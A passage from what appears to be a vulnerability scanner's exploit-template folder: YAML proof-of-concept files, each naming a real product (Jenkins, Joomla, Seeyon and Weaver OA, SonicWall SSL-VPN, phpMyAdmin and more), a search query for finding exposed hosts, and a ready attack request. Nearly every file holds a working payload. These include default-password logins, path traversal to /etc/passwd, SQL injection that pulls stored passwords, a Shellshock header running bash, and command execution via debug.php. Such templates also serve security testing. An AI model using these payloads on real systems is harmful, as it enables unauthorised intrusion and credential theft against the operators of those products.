https://blog.csdn.net/qq_45434762/article/details/115291413 12 | solution: 配置Jenkins登录验证 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /script 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: Groovy script 26 | type: contains 27 | - request: 28 | method: GET 29 | path: /computer/(master)/scripts 30 | redirect: false 31 | header: [ ] 32 | params: "" 33 | response: 34 | - name: body 35 | value: Groovy script 36 | type: contains 37 | create_at: "2022-04-27 14:48:51" 38 | -------------------------------------------------------------------------------- /core/plugins/exploits/JingHe OA C6 Default password.yaml: -------------------------------------------------------------------------------- 1 | app: 金和协同管理平台 2 | query: app:"金和协同管理平台" 3 | meta: 4 | name: JingHe OA C6 Default password 5 | level: 4 6 | tags: 7 | - Default password 8 | description: The attacker will log in as an administrator 9 | homepage: jinher.com 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: POST 19 | path: /C6/Jhsoft.Web.login/AjaxForLogin.aspx 20 | redirect: false 21 | header: 22 | - Content-Type: application/x-www-form-urlencoded 23 | params: type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw& 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: OK 30 | type: contains 31 | - name: body 32 | value: 系统管理员 33 | type: contains 34 | create_at: "2022-05-23 14:34:08" 35 | -------------------------------------------------------------------------------- /core/plugins/exploits/JingHe OA download.asp File read.yaml: -------------------------------------------------------------------------------- 1 | app: 金和协同管理平台 2 | query: app:"金和协同管理平台" 3 | meta: 4 | name: JingHe OA download.asp File read 5 | level: 4 6 | tags: 7 | - file_read 8 | description: There is an 
arbitrary file reading vulnerability in the Jinhe OA C6 download.asp file, through which an attacker can obtain sensitive information from the server 9 | homepage: http://www.jinher.com/ 10 | author: Administrator 11 | references: "" 12 | solution: Update 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config 20 | redirect: false 21 | header: 22 | - Content-type: application/x-www-form-urlencoded 23 | params: "" 24 | response: 25 | - name: body 26 | value: configuration 27 | type: contains 28 | - name: code 29 | value: "200" 30 | type: equals 31 | create_at: "2022-05-23 14:37:04" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Joomla_contushdvideoshare_任意文件读取漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: Joomla 2 | query: app:"joomla" 3 | meta: 4 | name: Joomla contushdvideoshare 任意文件读取漏洞 5 | level: 4 6 | tags: 7 | - file_read 8 | description: Joomla contushdvideoshare 存在任意文件读取漏洞 9 | homepage: https://www.joomla.org/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: the joomla configuration.php contain the words 26 | type: contains 27 | create_at: "2022-05-24 16:30:04" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/Joomla_departments_SQL注入.yaml: -------------------------------------------------------------------------------- 1 | app: Joomla 2 | query: app:"joomla" 3 | meta: 4 | name: Joomla departments SQL注入 5 | level: 4 6 | tags: 7 | - sql_injection 8 | description: Joomla
departments 存在SQL注入漏洞 9 | homepage: https://www.joomla.org/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5(700),3,4,5,6,7,8-- 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: e5841df2166dd424a57127423d276bbe 26 | type: contains 27 | create_at: "2022-05-24 16:27:00" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/Kingdee EAS server_file Directory traversal.yaml: -------------------------------------------------------------------------------- 1 | app: 金蝶eas 2 | query: app:"金蝶eas" 3 | meta: 4 | name: Kingdee EAS server_file Directory traversal 5 | level: 2 6 | tags: 7 | - Directory Traversal 8 | description: Kingdee EAS server file Directory traversal,The attacker can obtain the sensitive information of the server through directory traversal 9 | homepage: https://www.kingdee.com/ 10 | author: Administrator 11 | references: "" 12 | solution: Directory traversal 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /appmonitor/protected/selector/server_file/files?folder=/&suffix= 20 | redirect: true 21 | header: 22 | - Content-type: application/x-www-form-urlencoded 23 | params: "" 24 | response: 25 | - name: body 26 | value: folder 27 | type: contains 28 | - name: code 29 | value: "200" 30 | type: equals 31 | create_at: "2022-05-23 14:48:18" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Kingsoft V8 Default weak password.yaml: -------------------------------------------------------------------------------- 1 | app: 金山终端安全 2 | query: app:"金山终端安全" 3 | meta: 4 | name: Kingsoft V8 Default weak password 5 | level: 4 6 | tags: 7 | - weak_password 8 | description: The default 
weak password exists in the Jinshan V8 terminal security system, so the attacker can obtain all the host permissions (admin/admin) 9 | homepage: https://www.ejinshan.net/ 10 | author: Administrator 11 | references: "" 12 | solution: the attacker can obtain all the host permissions 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: POST 19 | path: /inter/ajax.php?cmd=get_user_login_cmd 20 | redirect: true 21 | header: [ ] 22 | params: '{"get_user_login_cmd":{"name\":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}' 23 | response: 24 | - name: body 25 | value: userSession 26 | type: contains 27 | - name: code 28 | value: "200" 29 | type: equals 30 | create_at: "2022-05-23 14:51:45" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Kyan网络监控设备账号密码泄露漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: Kyan 2 | query: title:"platform - Login" 3 | meta: 4 | name: Kyan网络监控设备账号密码泄露漏洞 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: ' Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站目录,攻击者可通过访问目录获取Kyan网络监控设备账号密码,进入控制后台。' 9 | homepage: "" 10 | author: Administrator 11 | references: https://blog.csdn.net/qq_36197704/article/details/115863364 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /hosts 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: UserName 29 | type: contains 30 | create_at: "2022-05-23 14:54:35" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/LanhaiZuoyue system debug.php RCE.yaml: -------------------------------------------------------------------------------- 1 | app: LanhaiZuoyue 2 | query: title:"蓝海卓越计费管理系统" 3 | meta: 4 | name: LanhaiZuoyue system debug.php RCE 5 | 
level: 4 6 | tags: 7 | - remote_code_execution 8 | description: "" 9 | homepage: https://www.cuoshui.com 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: POST 19 | path: /debug.php 20 | redirect: true 21 | header: 22 | - Content-type: application/x-www-form-urlencoded 23 | params: cmd=id 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: uid 30 | type: contains 31 | create_at: "2022-05-23 15:03:42" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/LanhaiZuoyue system download.php File read.yaml: -------------------------------------------------------------------------------- 1 | app: LanhaiZuoyue 2 | query: title:"蓝海卓越计费管理系统" 3 | meta: 4 | name: LanhaiZuoyue system download.php File read 5 | level: 3 6 | tags: 7 | - file_read 8 | description: "" 9 | homepage: "" 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /download.php?file=../../../../../etc/passwd 20 | redirect: false 21 | header: 22 | - Content-type: application/x-www-form-urlencoded 23 | params: "" 24 | response: 25 | - name: body 26 | value: 'root:' 27 | type: contains 28 | - name: code 29 | value: "200" 30 | type: equals 31 | create_at: "2022-05-23 15:05:49" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Lanproxy 目录遍历漏洞 CVE-2021-3019.yaml: -------------------------------------------------------------------------------- 1 | app: LanProxy 2 | query: app:"Lanproxy" 3 | meta: 4 | name: Lanproxy 目录遍历漏洞 CVE-2021-3019 5 | level: 3 6 | tags: 7 | - path_traversal 8 | description: Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 
(CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。 9 | homepage: https://github.com/ffay/lanproxy 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /../conf/config.properties 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: server.ssl 29 | type: contains 30 | create_at: "2022-05-23 15:08:10" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.yaml: -------------------------------------------------------------------------------- 1 | app: MessageSolution 2 | query: title:"MessageSolution Enterprise Email Archiving (EEA)" 3 | meta: 4 | name: MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码 9 | homepage: "" 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /authenticationserverservlet/ 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: administrator 29 | type: contains 30 | create_at: "2022-05-23 15:10:43" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Portainer为创建用户导致未授权访问(CVE-2018-19367).yaml: -------------------------------------------------------------------------------- 1 | app: Portainer 2 | query: title:"Portainer" 3 | meta: 4 | name: Portainer为创建用户导致未授权访问(CVE-2018-19367) 5 | level: 4 6 | tags: 7 | - ultra_vires 8 | description: 
Portainer是一款用于管理Docker环境和Docker主机的轻量级用户管理界面。 Portainer 1.19.2及之前版本中存在安全漏洞,该漏洞源于在管理员未被创建时,用于验证的API端点会返回404,而管理员已被创建时,则会返回204。攻击者可利用该漏洞在主机上获取未授权的访问权限。 9 | homepage: https://portainer.io/ 10 | author: Administrator 11 | references: https://github.com/lichti/shodan-portainer/ 12 | solution: 升级至新版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /api/users/admin/check 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "404" 26 | type: equals 27 | create_at: "2022-05-23 11:00:29" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/Ruijie smartweb weak password.yaml: -------------------------------------------------------------------------------- 1 | app: Ruijie 2 | query: app:"Ruijie" 3 | meta: 4 | name: Ruijie smartweb weak password 5 | level: 2 6 | tags: 7 | - weak_password 8 | description: Ruijie smartweb management system opens the guest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further attack (guest/guest) 9 | homepage: http://www.ruijie.com.cn/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: POST 19 | path: /WEB_VMS/LEVEL15/ 20 | redirect: true 21 | header: 22 | - Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 23 | params: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. 
24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: 'Level was: LEVEL15' 30 | type: contains 31 | create_at: "2022-05-23 15:21:41" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/RuoYi Druid Unauthorized access.yaml: -------------------------------------------------------------------------------- 1 | app: Ruoyi 2 | query: body:"/ruoyi/" 3 | meta: 4 | name: RuoYi Druid Unauthorized access 5 | level: 2 6 | tags: 7 | - Disclosure of Sensitive Information 8 | description: If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information 9 | homepage: https://gitee.com/y_project/RuoYi-Vue 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /prod-api/druid/index.html 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: Druid Stat Index 29 | type: contains 30 | - name: body 31 | value: View JSON API 32 | type: contains 33 | create_at: "2022-05-23 15:24:32" 34 | -------------------------------------------------------------------------------- /core/plugins/exploits/SDWAN智能网关应用系统弱口令.yaml: -------------------------------------------------------------------------------- 1 | app: "UniERM" 2 | query: body:"unierm_brand/logo.png" 3 | meta: 4 | name: SDWAN智能网关应用系统弱口令 5 | level: 3 6 | tags: 7 | - weak_password 8 | description: "" 9 | homepage: "" 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: POST 19 | path: /Login/Index/doLogin 20 | redirect: false 21 | header: 22 | - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 23 | params: username=admin&password=admin%40123 24 | 
response: 25 | - name: body 26 | value: "true" 27 | type: contains 28 | - name: body 29 | value: userid 30 | type: contains 31 | create_at: "2022-05-23 15:31:05" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Samsung WLAN AP WEA453e RCE.yaml: -------------------------------------------------------------------------------- 1 | app: Samsung WLAN AP WEA453e 2 | query: title:"Samsung WLAN AP" 3 | meta: 4 | name: Samsung WLAN AP WEA453e RCE 5 | level: 3 6 | tags: 7 | - remote_code_execution 8 | description: Samsung WLAN AP WEA453e router has a remote command execution vulnerability, which can execute arbitrary commands without authorization to obtain server permissions 9 | homepage: "" 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: POST 19 | path: /(download)/tmp/a.txt 20 | redirect: true 21 | header: [ ] 22 | params: command1=shell:cat /etc/passwd| dd of=/tmp/a.txt 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: root 29 | type: contains 30 | create_at: "2022-05-23 15:26:34" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Seeyon OA A6 DownExcelBeanServlet User information leakage.yaml: -------------------------------------------------------------------------------- 1 | app: seeyon 2 | query: app:"seeyon" 3 | meta: 4 | name: Seeyon OA A6 DownExcelBeanServlet User information leakage 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: There is an unauthorized interface in Zhiyuan OA A6, so that any visitor can download the user information in OA 9 | homepage: https://www.seeyon.com 10 | author: Administrator 11 | references: "" 12 | solution: delete file 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: 
/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: '@' 29 | type: contains 30 | create_at: "2022-05-23 15:39:10" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Seeyon OA A6 createMysql.jsp Disclosure of database sensitive information.yaml: -------------------------------------------------------------------------------- 1 | app: seeyon 2 | query: body:"致远协创A6" 3 | meta: 4 | name: Seeyon OA A6 createMysql.jsp Disclosure of database sensitive information 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: Seeyon OA A6 has database sensitive information disclosure. Attackers can obtain database account and password MD5 by accessing specific URL 9 | homepage: https://www.seeyon.com/ 10 | author: Administrator 11 | references: "" 12 | solution: The attacker can access the specific URL to obtain the database account and password MD5 13 | steps: 14 | verify_steps: 15 | type: or 16 | verify: 17 | - request: 18 | method: GET 19 | path: /yyoa/createMysql.jsp 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: root 29 | type: contains 30 | create_at: "2022-05-23 15:36:15" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Seeyon OA A6 initDataAssess.jsp User information leakage.yaml: -------------------------------------------------------------------------------- 1 | app: seeyon 2 | query: app:"seeyon" 3 | meta: 4 | name: Seeyon OA A6 initDataAssess.jsp User information leakage 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: |- 9 | Seeyon OA A6 initDataAssess.jsp There is leakage of user sensitive information 10 | You can get the user name blasting 
user password into the background to further attack 11 | homepage: https://www.seeyon.com/ 12 | author: Administrator 13 | references: "" 14 | solution: "" 15 | steps: 16 | verify_steps: 17 | type: and 18 | verify: 19 | - request: 20 | method: GET 21 | path: /yyoa/assess/js/initDataAssess.jsp 22 | redirect: false 23 | header: [ ] 24 | params: "" 25 | response: 26 | - name: code 27 | value: "200" 28 | type: equals 29 | - name: body 30 | value: personList 31 | type: contains 32 | - name: body 33 | value: /yyoa/index.jsp 34 | type: not contains 35 | create_at: "2022-05-23 15:41:05" 36 | -------------------------------------------------------------------------------- /core/plugins/exploits/Seeyon OA A6 setextno.jsp SQL injection.yaml: -------------------------------------------------------------------------------- 1 | app: seeyon 2 | query: app:"seeyon" 3 | meta: 4 | name: Seeyon OA A6 setextno.jsp SQL injection 5 | level: 3 6 | tags: 7 | - sql_injection 8 | description: Seeyon OA A6 setextno.jsp There is a SQL injection vulnerability, and the server can be controlled by injecting and writing webshell files 9 | homepage: https://www.seeyon.com/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=%2899999%29%20union%20all%20select%201,2,%28md5%281%29%29,4 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: c4ca4238a0b923820dcc509a6f75849b 29 | type: contains 30 | create_at: "2022-05-23 15:42:34" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Seeyon OA A8-m Information leakage.yaml: -------------------------------------------------------------------------------- 1 | app: seeyon 2 | query: app:"seeyon" 3 | meta: 4 | name: Seeyon OA A8-m 
Information leakage 5 | level: 3 6 | tags: 7 | - information_leakage 8 | description: Seeyon OA A8-m has state monitoring page information leakage, from which attackers can obtain sensitive information such as website path and user name for further attack 9 | homepage: https://www.seeyon.com/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /seeyon/management/index.jsp 20 | redirect: false 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: Password 26 | type: contains 27 | - name: code 28 | value: "200" 29 | type: equals 30 | create_at: "2022-05-23 15:47:51" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/Selea OCR-ANPR get_file.php File read.yaml: -------------------------------------------------------------------------------- 1 | app: Selea OCR-ANPR 2 | query: title:"Selea ANPR Camera" 3 | meta: 4 | name: Selea OCR-ANPR get_file.php File read 5 | level: 3 6 | tags: 7 | - file_read 8 | description: Selea OCR-ANPR get_file.php File read 9 | homepage: https://www.selea.com/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /cgi-bin/get_file.php 20 | redirect: true 21 | header: 22 | - Content-type: application/x-www-form-urlencoded 23 | params: name=pq&files_list=/etc/passwd 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: etc/passwd 30 | type: contains 31 | create_at: "2022-05-23 15:51:41" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/ShopXO download File read (CNVD-2021-15822).yaml: -------------------------------------------------------------------------------- 1 | app: shopxo 2 | query: app:"shopxo" 3 | meta: 4 | name: ShopXO 
download File read (CNVD-2021-15822) 5 | level: 3 6 | tags: 7 | - file_read 8 | description: ShopXO is an open-source, enterprise-level e-commerce system. ShopXO has an arbitrary file read vulnerability that an attacker can use to obtain sensitive information 9 | homepage: https://www.shopxo.net/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= 20 | redirect: true 21 | header: 22 | - Content-type: application/x-www-form-urlencoded 23 | params: "" 24 | response: 25 | - name: body 26 | value: 'root:' 27 | type: contains 28 | - name: code 29 | value: "200" 30 | type: equals 31 | create_at: "2022-05-23 15:56:21" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/SonicWall SSL-VPN 远程命令执行漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: SONICWALL-SSL-VPN 2 | query: app:"SonicWall-SSL-VPN" 3 | meta: 4 | name: SonicWall SSL-VPN 远程命令执行漏洞 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞 9 | homepage: https://www.sonicwall.com 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /cgi-bin/jarrewrite.sh 20 | redirect: true 21 | header: 22 | - User-Agent: () { :; }; echo ; /bin/bash -c 'cat /etc/passwd' 23 | params: "" 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: 'root:' 30 | type: contains 31 | create_at: "2022-05-23 16:02:35" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/TamronOS IPTV系统后台任意文件下载.yaml: -------------------------------------------------------------------------------- 1 |
app: TamronOS-IPTV 2 | query: app:"TamronOS-IPTV" 3 | meta: 4 | name: TamronOS IPTV系统后台任意文件下载 5 | level: 3 6 | tags: 7 | - file_download 8 | description: "" 9 | homepage: http://www.tamronos.com/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /download/backup?name=../../../../../../../../etc/passwd 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: 'root:' 29 | type: contains 30 | create_at: "2022-05-23 16:08:49" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/WangKang NS-ASG cert_download.php File read.yaml: -------------------------------------------------------------------------------- 1 | app: netentsec 2 | query: app:"netentsec" 3 | meta: 4 | name: WangKang NS-ASG cert_download.php File read 5 | level: 3 6 | tags: 7 | - file_read 8 | description: WangKang NS-ASG cert_download.php File read 9 | homepage: https://www.netentsec.com/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php 20 | redirect: true 21 | header: 22 | - Content-type: application/x-www-form-urlencoded 23 | params: "" 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: readfile 30 | type: contains 31 | create_at: "2022-05-23 16:27:57" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/Weaver OA 8 SQL injection.yaml: -------------------------------------------------------------------------------- 1 | app: Weaver 2 | query: app:"weaver" 3 | meta: 4 | name: Weaver OA 8 SQL injection 5 | level: 3 6 | tags: 7 | - sql_injection 8 | 
description: There is a SQL injection vulnerability in Weaver OA V8, through which an attacker can obtain administrator and server privileges 9 | homepage: https://www.weaver.com.cn/ 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: 请退出并重新访问 29 | type: not contains 30 | - name: body 31 | value: 32 | type: contains 33 | create_at: "2021-11-08 22:03:28" 34 | -------------------------------------------------------------------------------- /core/plugins/exploits/ecologyoa_clusterupgrade_-_upload.yaml: -------------------------------------------------------------------------------- 1 | app: Weaver 2 | query: app:"Weaver" 3 | meta: 4 | name: EcologyOA clusterupgrade - upload 5 | level: 4 6 | tags: 7 | - file_upload 8 | description: EcologyOA clusterupgrade interface has file upload vulnerability 9 | homepage: "" 10 | author: X prism 11 | references: "" 12 | solution: Update to new version 13 | create_at: "2024-07-13 12:35:15" 14 | available: false 15 | steps: 16 | variable: [] 17 | verify_steps: 18 | type: and 19 | verify: 20 | - request: 21 | method: GET 22 | path: /clusterupgrade/uploadFileClient.jsp 23 | redirect: true 24 | header: [] 25 | params: "" 26 | response: 27 | - name: body 28 | value: 安全校验失败 29 | type: contains 30 | exploit_steps: 31 | type: "" 32 | params: 33 | name: "" 34 | type: input 35 | value: "" 36 | -------------------------------------------------------------------------------- /core/plugins/exploits/fahuo100_sql_injection_CNVD_2021_30193.yaml: -------------------------------------------------------------------------------- 1 | app: 发货100 2 | query: 'header:"Cache-Control: no-store,
no-cache"' 3 | meta: 4 | name: fahuo100_sql_injection_CNVD_2021_30193 5 | level: 4 6 | tags: 7 | - sql_injection 8 | description: 发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息 9 | homepage: https://www.fahuo100.cn 10 | author: Administrator 11 | references: "" 12 | solution: 升级至安全版本 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: GET 19 | path: /?M_id=1'&type=product 20 | redirect: true 21 | header: [ ] 22 | params: "" 23 | response: 24 | - name: body 25 | value: mysql 26 | type: contains 27 | - name: body 28 | value: Warning 29 | type: contains 30 | create_at: "2022-05-23 11:59:29" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/landray-OA-Arbitrary-file-read.yaml: -------------------------------------------------------------------------------- 1 | app: Landray 2 | query: app:"Landray" 3 | meta: 4 | name: landray-OA-Arbitrary-file-read 5 | level: 3 6 | tags: 7 | - file_read 8 | description: 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。 9 | homepage: "" 10 | author: Administrator 11 | references: "" 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /sys/ui/extend/varkind/custom.jsp 20 | redirect: true 21 | header: 22 | - Content-Type: application/x-www-form-urlencoded 23 | params: var={"body":{"file":"file:///etc/passwd"}} 24 | response: 25 | - name: code 26 | value: "200" 27 | type: equals 28 | - name: body 29 | value: root 30 | type: equals 31 | create_at: "2022-05-23 15:00:38" 32 | -------------------------------------------------------------------------------- /core/plugins/exploits/phpmyadmin_反序列化漏洞.yaml: -------------------------------------------------------------------------------- 1 | app: phpMyAdmin 2 | query: app:"phpmyadmin" 3 | meta: 4 | name: phpmyadmin 反序列化漏洞 5 | level: 4 6 | tags: 7 | - remote_code_execution 8 | description: phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 9 
| homepage: https://www.phpmyadmin.net/ 10 | author: Administrator 11 | references: https://blog.csdn.net/qq_41832837/article/details/110277824 12 | solution: "" 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /scripts/setup.php 20 | redirect: true 21 | header: [ ] 22 | params: action=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";} 23 | response: 24 | - name: code 25 | value: "200" 26 | type: equals 27 | - name: body 28 | value: 'root:' 29 | type: contains 30 | create_at: "2022-05-24 16:36:09" 31 | -------------------------------------------------------------------------------- /core/plugins/exploits/phpunit CVE_2017_9841 远程代码执行.yaml: -------------------------------------------------------------------------------- 1 | app: phpunit 2 | query: app:"php" 3 | meta: 4 | name: phpunit CVE_2017_9841 远程代码执行 5 | level: 3 6 | tags: 7 | - remote_code_execution 8 | description: composer是php包管理工具,使用composer安装扩展包将会在当前目录创建一个vendor文件夹,并将所有文件放在其中。 9 | homepage: phpunit 10 | author: 一曲成殇 11 | references: https://blog.csdn.net/qq_45688822/article/details/115567143 12 | solution: 设置接口访问权限 13 | steps: 14 | verify_steps: 15 | type: and 16 | verify: 17 | - request: 18 | method: POST 19 | path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 20 | redirect: true 21 | header: [ ] 22 | params: 23 | response: 24 | - name: body 25 | value: PHP Version 26 | type: contains 27 | create_at: "2022-04-27 14:59:06" 28 | -------------------------------------------------------------------------------- /core/plugins/exploits/weaver_e-cology_beanshell_-_remote_command_execution.yaml: 